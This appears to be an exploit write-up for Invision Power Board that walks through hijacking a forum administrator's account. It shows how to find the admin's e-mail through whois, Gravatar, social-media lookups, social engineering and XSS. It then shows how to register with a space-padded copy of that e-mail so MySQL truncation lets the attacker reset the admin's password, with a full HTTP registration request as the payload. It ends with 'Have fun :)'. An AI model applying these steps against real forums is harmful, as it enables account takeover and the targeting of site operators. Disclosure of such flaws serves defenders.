Invision Power Board (abbreviated IPB, IP.Board or IP Board) is an Internet forum software produced by Invision Power Services, Inc. It is written in PHP and primarily uses MySQL as a database management system, although support for other database engines is available. While Invision Power Board is a commercially sold product, there is a large modding community and many of these modifications are free. In addition, many groups offer the download or design of free and paid skins.
- Required data:
The admin login is easily found by clicking on "The moderating Team" link on recent IPB's footer, or using the URL below: index.php?app=forums&module=extras§ion=stats&do=leaders
2) Administrator's e-mail
Obtaining the admin e-mail may be more complicated as there is no automated way to get it. The attacker can get it through:
- using whois on domain.tld to get registrar informations
- looking up a prospective e-mail on Facebook and see if a matching profile shows up
- using Gravatar (Gravatar is a personal avatar you can find on most blogs, forum, etc comments based on user e-mail address). Attacker can create a script to retrieve an email based on an avatar. For example mine is: http://www.john-jean.com/gravapwnd.php?zboob=john@wargan.com
- do sourcing using FB, G+, Twitter, Google SERP, ...
- use SE methods, such as faked e-mail catcher; or use XSSs on known websites consulted by the target.
- Exploitation:
Previously, on this adviso: we saw that $email is not rejected if it contains spurious whitespace, and that $member_key & $v length is not checked. We also saw some MySQL use-cases. Let's see how we can exploit that:
The e-mail field from the `members` table in IPB is declared as a varchar(150).
Upon registration, we fill the mail member (or admin) for which we want to steal the account to which we add a padding space for the size of the string exceeds 150. Then we add any character after the space one. It is necessary to bypass ajax's validator, feel free to use Burp Suite or Tamperdata.
For example:
Real administrator's email: 'admin@admin.com'
Attacker's mail fill: 'admin@admin.com AAAA'
The SELECT query checking existing e-mails will not yield any result:
SELECT * FROM members WHERE email='admin@admin.com AAAA'
The new account is successfully created. Our account is now using the e-mail address below:
'admin@admin.com '
AAAA has been deleted by MySQL: string exceeding 150 characters are truncated.
At this stage, we have two users with very similar e-mail addresses:
Administrator is: 'admin@admin.com'
Attacker is: 'admin@admin.com '
POST HTTP request looks like (on registration page):
************************ BEGIN OF CODE ************************
POST /~codereview/IPB/index.php?app=core&module=global§ion=register HTTP/1.1
Host: gfy.wargan.com
User-Agent: Wargan/1.0 (WarganOS; Amstrad; rv:1.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://gfx.wargan.com/~codereview/IPB/index.php?app=core&module=global§ion=register
Cookie: session_id=00000000000; member_id=2; pass_hash=000000000000; ipsconnect_0000000000=1; coppa=0; rteStatus=rte
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 466
termsread=1&agree_to_terms=1&do=process_form&coppa_user=0&nexus_pass=1&time_offset=1&dst=1&members_display_name=pentest&EmailAddress=pentest%40wargan.com A&PassWord=pentest&PassWord_Check=pentest&recaptcha_challenge_field=03AHJ_VuvGN728OMAVD0UvgLdylK1KAt8WH0N2aezZZpZfluTG8wJmfSyhiKM0zYb7io5sk62SQ9fQ2Y1XKqPOmEG0hW9DrThpXgEh-DU73qdpZ_OPxkO_v1xg2k1dJSOCk0wZcxufezfezefezFM0LSCwjJn7bbJJMk&recaptcha_response_field=mmotlyiinducted&agree_tos=1
************************* END OF CODE ***************************
We now can change our password. The profile corresponding to our session's e-mail will be used. As already stated, spaces are not taken in consideration. The query will thus actually return the first matching e-mail result: the real administrator account. We will have actually changed the password of the administrator profile.
This flaw is usable both on the registration page and on the user control panel (index.php?app=core&module=usercp&tab=core&area=email).
Have fun :)
